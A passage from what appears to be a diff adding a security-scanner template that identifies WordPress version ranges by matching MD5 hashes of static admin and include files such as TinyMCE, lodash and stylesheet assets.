"(\"5442cfbbb1ab1df7b84357bed44a6d10\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.1 + dsl: + - "(\"722661f3c458461e17f42ccb91d6d951\" == md5(body))" + - type: dsl + name: 5.4.3 - 5.6 + dsl: + - "(\"d9683ebc4fbcb974777935504c5b9680\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"ba771cf596a7fd154c43ea99e94b5083\" == md5(body))" + - type: dsl + name: 4.7.19 - 5.2.9 + dsl: + - "(\"1a4848edc676cde4a347a6a1ef1477cd\" == md5(body))" + - type: dsl + name: 3.7.35 - 4.6.20 + dsl: + - "(\"b8dab1edb309a4b7e21dead64991eaa5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-gallery.min.js" + matchers: + - type: dsl + name: 3.7 - 5.2.7 + dsl: + - "(\"3296d1fa20d292b002bba10490f1ba6e\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"75e959d883beb502e661572dd86d84f3\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.4 + dsl: + - "(\"53b0f902ba530b9ebfc3716ff006c8a4\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.1 + dsl: + - "(\"6aa020f29b4e78387028621dc2a1e987\" == md5(body))" + - type: dsl + name: 5.4.3 - 5.6 + dsl: + - "(\"aac04f629735f75726bbc0ea482c7884\" == md5(body))" + - type: dsl + name: 5.3.5 - 5.3.6 + dsl: + - "(\"1b6e81c7b603c050ecba93b522283460\" == md5(body))" + - type: dsl + name: 3.7.35 - 5.2.9 + dsl: + - "(\"1dcf2019c086d731dc3793a0c5afb7b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/inlite/theme.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"bf1d945945d6748aad3efed41f3f12ef\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"072d29e6b3b22ef87ec8af8a3a79b924\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"cc88f336999397d383b5fa434294a258\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"9e675131dcae21250f65f02d43c3b73b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"6c33490636e4a429f5388481fdc21921\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"c5e532252df4da20a8fc47f2398ae693\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"68c854763f6bd132b1cc20f6e0d1e970\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"9cba2d62377b91304375c96226eba843\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"ebd38a888450ac2bffe8115c8db03481\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"7b481194bebb48661b83a258e3ff090e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e25a3d100d6f3c33a4a145d0ed1e16c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/inlite/theme.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"9176de33c606c8c9b43fe11ecf01439f\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"ff6758c8f83385d2e839e15e12463720\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"fb14698a360d5a3d7857397104fc556c\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"11a18378a9afa362204054b59b618b16\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"0708be140b906ad238f8080afd1fd280\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"45eb0273b92eb8cd42cf66d44e2492fb\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"1fb22dab6ed32deabfed237aad759e24\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"77930c82ebe7bc5fb285ef8145e95c9d\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"e41a93fa397a59a3805d4271592a6d40\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"f51c77b5905ab12e3ef9c3c2259afcc3\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"344f1ce0e24412496360e1181995454a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/lists/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"20e9f3b6a4a72b77a6d2c5679542dff6\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"c9262830210151ba3773c4ad358067ac\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"c5646744ede702b668fb314569b37a51\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"00cb28ee11a26c67b2e1092341f6f667\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e3242c88652b5f2bb64d04bd32672ef1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"65001a3642b354f8a1ac6b71c832ecda\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"6bdcee3180998f7f8e13dc4917d8f9a9\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"279a5b0bf93f8d81288dfbd117b6c77c\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"826477563d7d3beb97e98c65259436be\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"9c7b5c4ee1505c256faaaa7fe64b4dfd\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"2c8d42c1cf6305ee4da6c9a8f1ae3a5a\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"f22019286074a87a7191766c89c4cfab\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"5d19da0a2153ae26cff3c6263d0e2b89\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"aac38cc02ba368de90157c29049151a3\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"1d6d5af175dd06021d60cf5d02856c67\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"32b438beb73a7396a577bc39e74a8fa3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"7c74a0f866c5dfd1dc9a45474651f6ef\" == md5(body))" + - type: dsl + name: 4.1 - 4.5.23 + dsl: + - "(\"1d8eb51f53f479c82c6c660f7f40ad40\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"35e463dbb829b4142c4baf52693035a0\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"80fca05c0bb63230df94b9868cc5fd30\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7a89e68c14d7d560251a55cdd2717047\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"cc93057ecab25b3d7ea1385cf9475654\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.8.35 + dsl: + - "(\"226e874723ff74a09b8ce66eacbaefbe\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3c2d355486c2165d31202b840ac78597\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/lodash.min.js" + matchers: + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"62acde2a2687c63954bee264a1a2f86d\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"bc0594c54450e8ac689739b6b198067a\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"913a2917447f6e4243fc9ffe398ad00e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/lodash.js" + matchers: + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"07ec8c63dfd89bcdb33f8bd14f4f8db8\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"050c900c28ad5d8275ff56f63b05becb\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"326ebe421b32d7cfe7015d83e7f7208e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"34800de78944cc6cf21ac3c61cd7df03\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"e506e7cb42244f39a47e21f4eada7421\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"5981cc4115225a71e097cef30b55df71\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3745d97e3f5618ffd6ac8e7f916fca42\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6926951583064a4532a7819f624c7756\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"686c7af3cc4a1474646963751a4a5a7e\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"7d2ef4bb244bac8a81d13ef4382d168e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5090bae2c114802440412e301bdf5174\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"4e0b29837fad1438a92fd0f27c43db68\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"07cb8d19850cdf59cd8aa2ba8d3ecca8\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"9651c10838a77fb4cca900b47d9d331c\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"35b20a1298ab637a58ac70fa73df335c\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"5b10ce987c2e7a6ccb8f2e8e197dd5ac\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"564275703d82fa3ba9b199743730c06b\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"e438b17739e7dea20da625c54590c83d\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"9c96643398461b53ec9c5d2085434a2d\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"67300742f2ebd668e53c3935f4a80964\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.4.4 + dsl: + - "(\"0de56511864c9de2a5cdb878010fc550\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8b026c6f37d6037237397741ac55c945\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/content.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"2f9c65ecc50238c129c9db06f7d1b0de\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"a163c2a2e85d1c363e181b3c57f30d8a\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"a1207b432127ddc0c383acfb711b5a78\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"b7c6c39dbee52e316139d6f41ec805ca\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"6f53d570185a3510ecd0c79b34be53d0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"7a782b3c28c8d32904c8caffe5d764ad\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"3fa0e763ae7456564829fa3e439c46f1\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"9b7df826ce7465aac717f19eca8cfd3b\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"8e445bfdef94a7238354f616c071602a\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.4.4 + dsl: + - "(\"0be8f6d47b7eb85f49cbb5b54feb4b40\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"95a2955c501549fdc9a5d8d83c5c88b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css" + matchers: + - type: dsl + name: 4.6 - 5.4.4 + dsl: + - "(\"e5313168fb2b657a4bd2f5e06b931a22\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"96b3a37270049ad482e5e0b14b2bff89\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"97ddcd95d500418cd2114974ff644812\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"aa77790f42e50f03b4ef956fc37cedd8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/coffee/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.4.4 + dsl: + - "(\"397e3820b27a234330c95e05250f61ce\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"e78e27aed68950c946a06a541ffa4ba7\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"215144fe0268ea34a511e791078fe8f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.scss" + matchers: + - type: dsl + name: 3.9 - 5.4.4 + dsl: + - "(\"1a7c5bfd9faf7f6cc77cd9b166062568\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"c52397b9dadfeb85c77059e70dd28b65\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"84b7aaf89eecd756f42a2c5e622a249a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/moment.min.js" + matchers: + - type: dsl + name: 5.0 - 5.4.4 + dsl: + - "(\"8999b8b5d07e9c6077ac5ac6bc942968\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"ab123abdffebc1fbd885949213b13f57\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/moment.js" + matchers: + - type: dsl + name: 5.0 - 5.4.4 + dsl: + - "(\"6722aa945b6577eda74330383105557f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e70a748e7cf42733bf14fa2030bd84ae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"2b5153576d1eee4002fb7ed9e5831251\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"c6d8c11219599e48d32cb3dbefe43d29\" == md5(body))" + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"62151e11b251bdda2295d9a8105e782a\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"e232c49b84f1291a9ce6468bfb114f1a\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"4e8d87c996953d8e9566e682ba348441\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3a314eb02806e8786c018f58ddfcbf27\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-backbone.js" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"ff08a91eba7f4fb95be7d5eb4a072d76\" == md5(body))" + - type: dsl + name: 3.9 - 4.4.24 + dsl: + - "(\"fdaba653baf259db7cb3d7a4d76a2970\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"066899e5caeb819e6fa0422c3ce92fbd\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"65105a0048efed09300417b61ad18cc9\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"ba62f36757662e2bb4585c05dedfd070\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"04afd74a8cae5409bbe26cd951cbc231\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/deprecated-media-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"ac5bc02b710e35115cadca960308560c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f6195709d41e1547898d1bd075091a4c\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"11bce99ac6be4fc46b9510278de3365a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"017b6102507494583f9241b9f8854959\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"74413a2404aadd63114f75e93d4e54c3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"385c6e9e75a08fbd280447c4190d7233\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2053b840e7091a03d9212f6eeaceab78\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"76e634724a9a1282e287a4d89da142a1\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"ae51dff82ed4709e6460661d4999aea8\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"f341cc91db43d556d8573cddc05e1ab4\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8952f7183f83e9f988df6cfab381e57d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/deprecated-media.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"b1cc8030eb9a806f2fa3a4aeecdac87c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"553fc5dcdad1a950968fd3889dd0798a\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"3fe617931e6f3e488d120de15875f696\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"625227ce35e802591f85a974db531d36\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"aef5bd3a2b515ab84f6e9fff6a7d4b15\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"c3b492ce52736917c0e7fd620a314036\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"bdf6c67b381490a4ecc8a12e0121b8cb\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"598fe37b999d9392bec5d439430a4447\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"87fe11509d4e425db64abd2e0394d4ef\" == md5(body))" + - type: dsl + name: 5.1 - 5.4.4 + dsl: + - "(\"d500c620b7f00683bef8e6b579f621f7\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5c0576d5df98fe54a147c7a9682b3735\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/_variables.scss" + matchers: + - type: dsl + name: 4.2 - 5.1.8 + dsl: + - "(\"3ab501096b1a091972d84c85b284135a\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"769f771a3f3fdb68e59c9c71b0a7baab\" == md5(body))" + - type: dsl + name: 5.2 - 5.3 + dsl: + - "(\"719b571cacd7a1e140377a7a3ecf8cd4\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"7cc967183c11b5c46e0cb2a83132fe9a\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d590e45d50e3cc8d6698e9566bff6bc9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/clipboard.js" + matchers: + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"945fc983fe7bb6fbf3d3ad76f5246b11\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d49273842035439fc99acc628cd64c46\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.woff2" + matchers: + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"e3ce3e0415834a28cb23ac40d5ef1acc\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4db6aca14e3ac2d227e5caa4b7dbc8b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/nav-menu.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"2975b2cb1f865538da0f7056f3f267f5\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f5ae9e78b47c5096b10afeb0e1e951e5\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"2018071a5a024a8a8c56f793c415e4c1\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"f0b45151e04c6dc6061556c6e889431d\" == md5(body))" + - type: dsl + name: 4.2.4 - 4.2.29 + dsl: + - "(\"e4fc225947f25daa1cc8e153caabf98a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.3 + dsl: + - "(\"d6facb8a8fe8d2ed1cdef140d006942a\" == md5(body))" + - type: dsl + name: 4.0.2 - 4.1.32 + dsl: + - "(\"c80084b98b0ee2a45e17dd3eef229d8d\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.1 + dsl: + - "(\"1ac435f167ec9c539cf405e139fc9a45\" == md5(body))" + - type: dsl + name: 3.8.6 - 3.9.33 + dsl: + - "(\"44f78808e404a41a0335959ae3e71d4c\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.3 + dsl: + - "(\"d1511ebb0763771ef8704b71a1abf1f0\" == md5(body))" + - type: dsl + name: 3.7.6 - 3.7.35 + dsl: + - "(\"2c6d5b682afadc134de7b46b1d201141\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.5 + dsl: + - "(\"a784f15f81f5a7dfdeda227d1ae8bd02\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"6b451d41fb408bf92f39a2c86b2fc544\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"c9058b907f0a2b1a81885047ef33660c\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"7b471a387caf8b12d1f852c1b8bc9164\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"2163970d52136c60d14dd9e2a911bdad\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"99dc2904606935a86b4e09f2fccd3158\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"404825b185b9d372a012af2d0522c4cc\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4ebe903cffb8b10b75569a121e899b53\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"ec9f05e576f73e06177bfbce15ae9747\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"1495197fcb73221ecc07015adb0f97a6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"32237fd4dbc69f6bbf3b7f7496cc674f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ef806de6ca6f1220a40137423a090d32\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"88ebb8aaac396aa64835549f8812141b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/handlers.js" + matchers: + - type: dsl + name: 4.6.6 - 5.2.9 + dsl: + - "(\"7a8494f68ff136d5bf92a075fa61dfe0\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.4 + dsl: + - "(\"06e4d64e099466eaa3185f1850884821\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.5.23 + dsl: + - "(\"0f6712d2c464a0d1004730a681d535b1\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.8 + dsl: + - "(\"c9d857501549cabf90a9c546f0556729\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.17 + dsl: + - "(\"9798444b97233bb341b19f374f85c11c\" == md5(body))" + - type: dsl + name: 3.9.19 - 4.1.32 + dsl: + - "(\"e7ba5e91add4b63a869cfc89fba4e450\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.20 + dsl: + - "(\"d39498ac697640f306f8a37ac4f9ac30\" == md5(body))" + - type: dsl + name: 3.8.21 - 3.8.35 + dsl: + - "(\"224c433a1b7108849dabd9c4b28a5820\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.7.20 + dsl: + - "(\"878e0b76338a31dd288a1ed089cb6a4f\" == md5(body))" + - type: dsl + name: 3.7.21 - 3.7.35 + dsl: + - "(\"5a7bd4909e9b554d9d6d14d8e3672f72\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.1 + dsl: + - "(\"1d74c489a7777d0fa6b226eccb151140\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"95d55f5d43ce4423cfeb1efcf61f6bcc\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ab233bf82692d9cc49208b8fee6ee3fa\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"326108da685f0873de9fc07143688f1e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e7915174a661686126042ac03ae03ed4\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4fb1cd09a97e8c35fec738f6cdab3b99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/comment.min.js" + matchers: + - type: dsl + name: 4.3 - 5.2.9 + dsl: + - "(\"8f3603ed0d77c4a1ae8f82dbd3159ed9\" == md5(body))" + - type: dsl + name: 3.7 - 4.2.29 + dsl: + - "(\"38ff692f79a3e57df9b9192a9e43b4ea\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"69354baaaebfb1acc18bbdd9b2b1fdb8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3146fd138614355e041e261a4294dc23\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"284349b341676993d9505326abc1f869\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"17e8c1774aa7ebd6e18181b77804f763\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.min.js" + matchers: + - type: dsl + name: 3.7 - 5.0.11 + dsl: + - "(\"8bc5ca12fa38a607d5af2181311b7a5b\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"62151e11b251bdda2295d9a8105e782a\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"927b30f924f2e11a7a78f63bb8d54393\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f037e26c97a0b05a4acc67e8cfeee01b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ba88585b7e0465b5de31f14e5a9aa60c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"31c250b54ebc48820839657f0bf24049\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/password-strength-meter.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"1aaa74a24aef982b82498717c1d1e6d1\" == md5(body))" + - type: dsl + name: 3.8 - 4.5.23 + dsl: + - "(\"3185f27c8fa4123db79a1d6de055c9d7\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"66ceeaf9fb0d3e36069cb2a5b4537787\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"fe72628809263f3d3dd7227053f9c9e5\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"7ffac3719681634d55315bb7020f0c35\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"831a0bdbf910b4139812e1327c992655\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a1dfc4ad5828bcc09702a4e6f1365550\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"f9241f23581e39fc27e2542e36240eac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"77395fe1e3d510014a30d65a1464d5bb\" == md5(body))" + - type: dsl + name: 3.8 